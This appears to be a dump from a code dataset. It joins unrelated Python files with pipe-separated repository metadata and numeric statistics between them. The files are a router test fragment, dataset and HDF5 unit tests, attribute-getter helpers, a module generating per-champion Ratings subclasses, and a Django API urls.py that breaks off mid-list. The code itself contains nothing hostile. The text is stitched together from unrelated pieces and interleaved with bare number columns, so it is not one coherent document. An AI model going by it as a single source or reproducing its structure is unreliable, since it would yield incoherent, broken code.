req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='POST')
req.get_header.return_value = '1,2,3,4'
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
| 38.852878
| 105
| 0.510207
| 1,655
| 18,222
| 5.367976
| 0.118429
| 0.065849
| 0.007429
| 0.009905
| 0.802679
| 0.789847
| 0.761932
| 0.754615
| 0.74955
| 0.739757
| 0
| 0.011939
| 0.351882
| 18,222
| 468
| 106
| 38.935897
| 0.740305
| 0.058336
| 0
| 0.768116
| 0
| 0
| 0.135815
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.038647
| false
| 0
| 0.016908
| 0
| 0.065217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae17fcc9b6182fe294fc511fff4c5eb6e688d2de
| 7,833
|
py
|
Python
|
app/backend/core/dataset/dataset_test.py
|
SummaLabs/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 32
|
2017-09-04T17:40:39.000Z
|
2021-02-16T23:08:34.000Z
|
app/backend/core/dataset/dataset_test.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 3
|
2017-10-09T12:52:54.000Z
|
2020-06-29T02:48:38.000Z
|
app/backend/core/dataset/dataset_test.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 20
|
2017-10-07T17:29:50.000Z
|
2021-01-23T22:01:54.000Z
|
import shutil, tempfile
import skimage.io as skimgio
from input import Input, Schema, CategoricalColumnMetadata
from img2d import Img2DColumn
from dataset import Dataset, RecordWriter, RecordReader
import unittest
import os
import numpy as np
from input_test import create_test_data
from input_test import categories
def create_test_dataset(test_dir, test_csv_file_path, dataset_name, header=False, is_related_path=False):
col_0 = 'col_0'
col_1 = 'col_1'
col_5 = 'col_5'
if header:
col_0 = 'col_0_h'
col_1 = 'col_1_h'
col_5 = 'col_5_h'
schema = Schema.from_csv(csv_path=test_csv_file_path, header=header)
schema.merge_columns_in_range('col_vector', (2, 4))
input = Input(schema)
input.add_categorical_column(col_0)
input.add_numeric_column(col_1)
input.add_vector_column('col_vector')
img2d = Img2DColumn(is_related_path=is_related_path)
input.add_column(col_5, img2d)
return Dataset.Builder(input, dataset_name, test_dir, parallelism_level=2).build()
class TestDataSetBuilder(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.test_csv_file_path, self.test_img_file_path = create_test_data(self.test_dir, 10)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_process_csv_file(self):
schema = Schema.from_csv(csv_path=self.test_csv_file_path)
input = Input(schema)
input.add_categorical_column('col_0')
rows = Dataset.Builder(input=input, name="test", root_dir=self.test_dir, parallelism_level=2)._process_csv_files()
self.assertEqual(len(rows), 10)
for column in input.columns:
if column.name == 'col_0':
self.assertTrue(len(column.metadata.categories), 4)
def test_build_dataset_absolute_path(self):
dataset = create_test_dataset(self.test_dir, self.test_csv_file_path, "test_dataset_name")
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 10)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
categories_vector = data['col_0']
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
# Load dataset
dataset = Dataset.load(dataset._path)
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 10)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
def test_build_dataset_related_path_header_true(self):
test_csv_file_path, test_img_file_path = create_test_data(self.test_dir, 10, header=True, is_related_path=True)
dataset = create_test_dataset(self.test_dir, test_csv_file_path, "test_dataset_name", header=True, is_related_path=True)
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 9)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
categories_vector = data['col_0_h']
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1_h']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
# Load dataset
dataset = Dataset.load(dataset._path)
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 9)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1_h']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
class TestHDF5RecordWriterReader(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.test_csv_file_path, self.test_img_file_path = create_test_data(self.test_dir, 10)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_write_read_record_raw_img_true(self):
schema = Schema.from_csv(csv_path=self.test_csv_file_path)
schema.merge_columns_in_range('col_vector', (2, 4))
input = Input(schema)
input.add_categorical_column('col_0')
for column in input.columns:
if column.name == 'col_0':
metadata = CategoricalColumnMetadata()
metadata._categories = categories
column.metadata = metadata
input.add_numeric_column('col_1')
input.add_vector_column('col_vector')
img2d = Img2DColumn(pre_transforms=[], post_transforms=[], is_raw_img=True)
input.add_column("col_5", img2d)
os.makedirs(os.path.join(self.test_dir, Dataset.DATA_DIR_NAME))
record_writer = RecordWriter.factory('HDF5', self.test_dir, input.columns)
csv_row = [ent.strip() for ent in Schema.read_n_rows(csv_file_path=self.test_csv_file_path, delimiter=",", rows_number=1)[0]]
precessed_row = {}
for column in input.columns:
precessed_row[column.name] = column.process_on_write(csv_row)
record_writer.write(precessed_row, 0)
record_reader = RecordReader.factory('HDF5', self.test_dir)
record = record_reader.read(0)
data = {}
for column in input.columns:
data[column.name] = column.process_on_read(record)
img_deserialized = data['col_5']
img_original = skimgio.imread(self.test_img_file_path)
self.assertTrue(np.array_equal(img_deserialized, img_original))
def test_write_read_record_raw_img_false(self):
schema = Schema.from_csv(csv_path=self.test_csv_file_path)
schema.merge_columns_in_range('col_vector', (2, 4))
input = Input(schema)
input.add_categorical_column('col_0')
for column in input.columns:
if column.name == 'col_0':
metadata = CategoricalColumnMetadata()
metadata._categories = categories
column.metadata = metadata
input.add_numeric_column('col_1')
input.add_vector_column('col_vector')
img2d = Img2DColumn(pre_transforms=[], post_transforms=[], is_raw_img=False)
input.add_column("col_5", img2d)
os.makedirs(os.path.join(self.test_dir, Dataset.DATA_DIR_NAME))
record_writer = RecordWriter.factory('HDF5', self.test_dir, input.columns)
csv_row = [ent.strip() for ent in Schema.read_n_rows(csv_file_path=self.test_csv_file_path, delimiter=",", rows_number=1)[0]]
precessed_row = {}
for column in input.columns:
precessed_row[column.name] = column.process_on_write(csv_row)
record_writer.write(precessed_row, 0)
record_reader = RecordReader.factory('HDF5', self.test_dir)
record = record_reader.read(0)
data = {}
for column in input.columns:
data[column.name] = column.process_on_read(record)
img_deserialized = data['col_5']
img_original = skimgio.imread(self.test_img_file_path)
self.assertTrue(np.array_equal(img_deserialized, img_original))
if __name__ == '__main__':
unittest.main()
| 46.076471
| 133
| 0.686455
| 1,085
| 7,833
| 4.652535
| 0.115207
| 0.045959
| 0.034865
| 0.035658
| 0.842908
| 0.833399
| 0.804081
| 0.768621
| 0.768621
| 0.759707
| 0
| 0.018856
| 0.214605
| 7,833
| 170
| 134
| 46.076471
| 0.801691
| 0.052215
| 0
| 0.711409
| 0
| 0
| 0.039903
| 0
| 0
| 0
| 0
| 0
| 0.134228
| 1
| 0.067114
| false
| 0
| 0.067114
| 0
| 0.154362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae1e243513e231576c3137c7bc926a3beb4909f8
| 2,334
|
py
|
Python
|
scitwi/utils/attrs.py
|
vahndi/scitwi
|
e873ea8b21710fd7b9a1cec0da594ccef91c54a2
|
[
"MIT"
] | null | null | null |
scitwi/utils/attrs.py
|
vahndi/scitwi
|
e873ea8b21710fd7b9a1cec0da594ccef91c54a2
|
[
"MIT"
] | null | null | null |
scitwi/utils/attrs.py
|
vahndi/scitwi
|
e873ea8b21710fd7b9a1cec0da594ccef91c54a2
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from scitwi.utils.misc import get_datetime
def bool_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: bool
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return None
def datetime_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: datetime
"""
if attr_dict_key in attr_dict.keys():
return get_datetime(attr_dict[attr_dict_key])
return None
def dict_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: dict
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return {}
def int_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: int
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return None
def float_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: float
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return None
def str_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: str
"""
if attr_dict is None:
return ''
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return ''
def list_obj_attr(attr_dict: dict, attr_dict_key: str, obj_type: type):
if attr_dict_key in attr_dict.keys() and attr_dict[attr_dict_key] is not None:
return [obj_type(v) for v in attr_dict[attr_dict_key]]
return []
def list_int_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: List[int]
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return []
def list_float_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: List[float]
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return []
def list_str_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: List[str]
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return []
def obj_attr(attr_dict: dict, attr_dict_key: str, obj_type: type):
if attr_dict is None:
return None
if attr_dict_key in attr_dict.keys():
if attr_dict[attr_dict_key] is not None:
return obj_type(attr_dict[attr_dict_key])
return None
| 22.882353
| 82
| 0.655099
| 363
| 2,334
| 3.859504
| 0.07989
| 0.411135
| 0.274804
| 0.256959
| 0.907209
| 0.907209
| 0.882941
| 0.862241
| 0.785153
| 0.686652
| 0
| 0
| 0.239931
| 2,334
| 102
| 83
| 22.882353
| 0.789741
| 0.058269
| 0
| 0.627451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.215686
| false
| 0
| 0.039216
| 0
| 0.72549
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
ae4b4936ec99be0d71f2f8b4188d464db4ca1978
| 6,821
|
py
|
Python
|
loldib/getratings/models/NA/na_malzahar/na_malzahar_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_malzahar/na_malzahar_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_malzahar/na_malzahar_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings

"""Per-matchup rating models for NA Malzahar (support role).

This module exposes one empty ``Ratings`` subclass per opposing champion,
named ``NA_Malzahar_Sup_<Champion>``.  The original file spelled out all
138 classes by hand; they are generated programmatically below to remove
the duplication.  The resulting module namespace is identical: every class
has the same name, the same single base class ``Ratings``, an empty body,
and the correct ``__module__``, so lookups, subclass checks and
``from ... import *`` behave exactly as before.
"""

# Opposing-champion identifiers, in the original declaration order.
# Names use Riot's internal spellings (e.g. MonkeyKing == Wukong).
_CHAMPIONS = (
    "Aatrox", "Ahri", "Akali", "Alistar", "Amumu", "Anivia", "Annie",
    "Ashe", "AurelionSol", "Azir", "Bard", "Blitzcrank", "Brand", "Braum",
    "Caitlyn", "Camille", "Cassiopeia", "Chogath", "Corki", "Darius",
    "Diana", "Draven", "DrMundo", "Ekko", "Elise", "Evelynn", "Ezreal",
    "Fiddlesticks", "Fiora", "Fizz", "Galio", "Gangplank", "Garen",
    "Gnar", "Gragas", "Graves", "Hecarim", "Heimerdinger", "Illaoi",
    "Irelia", "Ivern", "Janna", "JarvanIV", "Jax", "Jayce", "Jhin",
    "Jinx", "Kalista", "Karma", "Karthus", "Kassadin", "Katarina",
    "Kayle", "Kayn", "Kennen", "Khazix", "Kindred", "Kled", "KogMaw",
    "Leblanc", "LeeSin", "Leona", "Lissandra", "Lucian", "Lulu", "Lux",
    "Malphite", "Malzahar", "Maokai", "MasterYi", "MissFortune",
    "MonkeyKing", "Mordekaiser", "Morgana", "Nami", "Nasus", "Nautilus",
    "Nidalee", "Nocturne", "Nunu", "Olaf", "Orianna", "Ornn", "Pantheon",
    "Poppy", "Quinn", "Rakan", "Rammus", "RekSai", "Renekton", "Rengar",
    "Riven", "Rumble", "Ryze", "Sejuani", "Shaco", "Shen", "Shyvana",
    "Singed", "Sion", "Sivir", "Skarner", "Sona", "Soraka", "Swain",
    "Syndra", "TahmKench", "Taliyah", "Talon", "Taric", "Teemo",
    "Thresh", "Tristana", "Trundle", "Tryndamere", "TwistedFate",
    "Twitch", "Udyr", "Urgot", "Varus", "Vayne", "Veigar", "Velkoz",
    "Vi", "Viktor", "Vladimir", "Volibear", "Warwick", "Xayah", "Xerath",
    "XinZhao", "Yasuo", "Yorick", "Zac", "Zed", "Ziggs", "Zilean", "Zyra",
)

# Create each empty subclass and publish it under its conventional name.
# type(name, bases, dict) at module level is equivalent to an empty
# ``class`` statement: same __name__, __qualname__ and __module__.
for _champion in _CHAMPIONS:
    _cls = type("NA_Malzahar_Sup_" + _champion, (Ratings,), {})
    globals()[_cls.__name__] = _cls

# Don't leak loop temporaries into the module namespace.
del _champion, _cls
| 16.357314
| 46
| 0.776133
| 972
| 6,821
| 5.020576
| 0.151235
| 0.197951
| 0.42418
| 0.509016
| 0.814139
| 0.814139
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162879
| 6,821
| 416
| 47
| 16.396635
| 0.854641
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
ae94138b77eae87c6d2d4d80934603bce77497f2
| 42,873
|
py
|
Python
|
api/urls.py
|
manisharmagarg/qymatix
|
0dc240970359429ae5105db79f9aebf1a99ba6fd
|
[
"Apache-2.0"
] | null | null | null |
api/urls.py
|
manisharmagarg/qymatix
|
0dc240970359429ae5105db79f9aebf1a99ba6fd
|
[
"Apache-2.0"
] | null | null | null |
api/urls.py
|
manisharmagarg/qymatix
|
0dc240970359429ae5105db79f9aebf1a99ba6fd
|
[
"Apache-2.0"
] | null | null | null |
# from django.conf.urls import patterns, url
from django.urls import path, re_path
from django.contrib.auth.decorators import login_required
# from tokenapi.decorators import token_required
from tokenapi.decorators import token_required
from api import actionsapi
from api import contactsapi
from api import customersapi
from api import dataanalysisapi
from api import insightsapi
from api import salesapi
from api import usersapi
from api import groupsapi
from api import mapsapi
from api import productsapi
from api import goalsapi
from api import industryapi
# from api import currenciesapi
# from api import xingapi
# from webapp import views
urlpatterns = [
# re_path(r'^doc$', customersapi.apidoc_index, name=u"apidoc"),
re_path(r'^doc/$', login_required(customersapi.apidoc_index, login_url='/webapp/v1.0/login'), name=u"apidoc"),
re_path(r'^doc/index/$', login_required(customersapi.apidoc_index, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/search/$', login_required(customersapi.apidoc_search, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/genindex/$', login_required(customersapi.apidoc_genindex, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/introduction/$', login_required(customersapi.apidoc_introduction, login_url='/webapp/v1.0/login'), name=u"apidoc"),
re_path(r'^doc/customer_functions/$', login_required(customersapi.apidoc_customer_functions, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/users_api/$', login_required(usersapi.apidoc_users_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/actions_api/$', login_required(actionsapi.apidoc_actions_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/goals_api/$', login_required(goalsapi.apidoc_goals_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/products_api/$', login_required(productsapi.apidoc_products_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
# re_path(r'^(?P<workspace>\d+)/upload$', login_required(views.upload), name=u"upload"),
# re_path(r'^(?P<workspace>\d+)/(?P<user>\d+):(?P<token>[-\w\d-]+)/upload$', token_required(views.upload), name=u"upload"),
# Critters related urls
# Insights
re_path(r'^(?P<workspace>\d+)/getinsights$', login_required(insightsapi.getInsights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getinsights/(?P<account>.*)$', login_required(insightsapi.getInsights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/get_insights$', login_required(insightsapi.get_insights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/get_insights/(?P<account>.*)$', login_required(insightsapi.get_insights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCustomerRisk$', login_required(insightsapi.getCustomerRisk, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCustomerRisk/(?P<account>[-\w ]+)$', login_required(insightsapi.getCustomerRisk, login_url='/webapp/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProducts$', login_required(insightsapi.getCrossSellingProducts, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProducts/(?P<account>.*)$', login_required(insightsapi.getCrossSellingProducts, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProductTypes$', login_required(insightsapi.getCrossSellingProductTypes, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProductTypes/(?P<account>.*)$', login_required(insightsapi.getCrossSellingProductTypes, login_url='/webapp/v1.0/login/'), name=u"apidata"),
# Customers
re_path(r'^(?P<workspace>\d+)/getdata$', login_required(customersapi.getCustomersData, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getcustomerslist$', login_required(customersapi.getCustomersList, login_url='/webapp/v1.0/login/'), name=u"apigetcustomerslist"),
re_path(r'^(?P<workspace>\d+)/getcustomers$', login_required(customersapi.getCustomers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcustomers/(?P<account>.*)$', login_required(customersapi.getCustomers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/get_customers$', login_required(customersapi.get_customers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/get_customers/(?P<account>.*)$', login_required(customersapi.get_customers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/insertCustomer/(?P<data>.*)$', login_required(customersapi.insertCustomer), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyCustomer/(?P<data>.*)$', login_required(customersapi.modifyCustomer), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteCustomer/(?P<data>.*)$', login_required(customersapi.deleteCustomer), name=u"saveCustData"),
# Contacts
re_path(r'^(?P<workspace>\d+)/getdata$', login_required(contactsapi.getContactsData, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getcontactslist$', login_required(contactsapi.getContactsList, login_url='/webapp/v1.0/login/'), name=u"apigetcustomerslist"),
re_path(r'^(?P<workspace>\d+)/getcontactslist/(?P<account>.*)$', login_required(contactsapi.getContactsList, login_url='/webapp/v1.0/login/'), name=u"apigetcustomerslist"),
re_path(r'^(?P<workspace>\d+)/getcontacts$', login_required(contactsapi.getContacts, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcontactsByCustomer$', login_required(contactsapi.getContactsByCustomer, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcontactsByCustomer/(?P<account>.*)$', login_required(contactsapi.getContactsByCustomer, login_url='/webapp/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcontacts/(?P<account>.*)$', login_required(contactsapi.getContacts, login_url='/webapp/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/insertContact/(?P<data>.*)$', login_required(contactsapi.insertContact), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyContact/(?P<data>.*)$', login_required(contactsapi.modifyContact), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteContact/(?P<data>.*)$', login_required(contactsapi.deleteContact), name=u"saveCustData"),
# # Sales
re_path(r'^(?P<workspace>\d+)/insertSalesRecord/(?P<data>.*)$', login_required(salesapi.insertSalesRecord), name=u"saveCustData"),
# # Products
re_path(r'^(?P<workspace>\d+)/insertProduct/(?P<data>.*)$', login_required(productsapi.insertProduct), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/insertProductType/(?P<data>.*)$', login_required(productsapi.insertProductType), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/insertProductLine/(?P<data>.*)$', login_required(productsapi.insertProductLine), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/insertProductClass/(?P<data>.*)$', login_required(productsapi.insertProductClass), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteProduct/(?P<product>.*)$', login_required(productsapi.deleteProduct), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteProductType/(?P<product>.*)$', login_required(productsapi.deleteProductType), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProducts$', login_required(productsapi.getProducts), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductsBy$', login_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductsBy/(?P<groupby>.*)$', login_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductInsights$', login_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductInsights/(?P<params>.*)$', login_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/get_product_insights$', login_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/get_product_insights/(?P<params>.*)$', login_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductTypeInsights$', login_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductTypeInsights/(?P<params>.*)$', login_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/topproducts$', login_required(productsapi.topProducts), name=u"setconfiginfo"),
re_path(r'^(?P<workspace>\d+)/topproducts/(?P<params>.*)$', login_required(productsapi.topProducts), name=u"setconfiginfo"),
# KAMs
re_path(r'^(?P<workspace>\d+)/createKam/(?P<data>.*)$', login_required(actionsapi.createKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyKam/(?P<data>.*)$', login_required(actionsapi.modifyKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/mergeKams/(?P<data>.*)$', login_required(actionsapi.mergeKams), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteKam/(?P<kamid>.*)$', login_required(actionsapi.deleteKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getKam/(?P<data>.*)$', login_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getKam$', login_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/linkKamToAction/(?P<lk>.*)$', login_required(actionsapi.linkKamToAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkKamFromAction/(?P<lk>.*)$', login_required(actionsapi.unlinkKamFromAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/linkKamToPlan/(?P<lk>.*)$', login_required(actionsapi.linkKamToPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkKamFromPlan/(?P<lk>.*)$', login_required(actionsapi.unlinkKamFromPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/linkKamToCustomer/(?P<lk>.*)$', login_required(actionsapi.linkKamToCustomer), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkKamFromCustomer/(?P<lk>.*)$', login_required(actionsapi.unlinkKamFromCustomer), name=u"apigetplans"),
# Xing
# re_path(r'^(?P<workspace>\d+)/getXingJobs$', login_required(xingapi.getXingJobs), name=u"saveCustData"),
# re_path(r'^(?P<workspace>\d+)/getXingUserProfile$', login_required(xingapi.getXingUserProfile), name=u"saveCustData"),
# Goals
re_path(r'^(?P<workspace>\d+)/createGoal/(?P<data>.*)$', login_required(goalsapi.createGoal), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyGoal/(?P<data>.*)$', login_required(goalsapi.modifyGoal), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoals/(?P<data>.*)$', login_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoals$', login_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsByYear/(?P<data>.*)$', login_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsByYear$', login_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsPerQuarter/(?P<data>.*)$', login_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsPerQuarter$', login_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
#url(ur'^getGoals$', login_required(goalsapi.getGoals), name=u"saveCustData"),
# Performance
re_path(r'^(?P<workspace>\d+)/getTotalPerformance$', login_required(goalsapi.getTotalPerformance), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getPerformance$', login_required(goalsapi.getPerformance), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getPerformanceKpi$', login_required(goalsapi.getPerformanceKpi), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getPerformanceCRM$', login_required(goalsapi.getPerformanceCRM), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/get_performance_crm$', login_required(goalsapi.get_performance_crm), name=u"saveCustData"),
# re_path(r'^(?P<workspace>\d+)/get_performance_crm$', login_required(goalsapi.get_performance_crm), name=u"saveCustData"),
# re_path(r'^(?P<workspace>\d+)/Performance_search$', login_required(goalsapi.get_performance_crm), name=u"saveCustData"),
# Data analysis
#url(ur'^(?P<workspace>\d+)/analyzeData$', login_required(dataanalysisapi.analyzeData), name=u"saveCustData"),
# Actions
re_path(r'^(?P<workspace>\d+)/getactions$', login_required(actionsapi.getTasks, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/getactions/(?P<account>.*)$', login_required(actionsapi.getTasks, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/getActions$', login_required(actionsapi.getActions, login_url='/webapp/login/'), name=u"apigetactions"),
